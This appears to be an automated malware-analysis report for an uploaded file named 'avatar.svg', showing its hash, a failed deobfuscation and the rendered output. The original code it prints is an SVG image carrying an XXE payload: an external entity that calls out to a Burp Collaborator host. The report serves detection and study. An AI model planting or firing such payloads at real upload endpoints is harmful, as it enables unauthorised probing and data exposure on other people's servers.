PHP Malware Analysis

avatar.svg

md5: 96de7032f54201e85d88ec5e7cc990c9

Jump to:

Screenshot


Attributes

URLs


Deobfuscated PHP code

Failed to deobfuscate code

Execution traces


Generated HTML code

<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="128px" height="128px" version="1.1">
   <text font-size="16" x="0" y="16"/>
</svg>

Original PHP code

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://49bdf1whts7kk39b0d1s3kqpagg94y.burpcollaborator.net"> ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
   <text font-size="16" x="0" y="16">&xxe;</text>
</svg>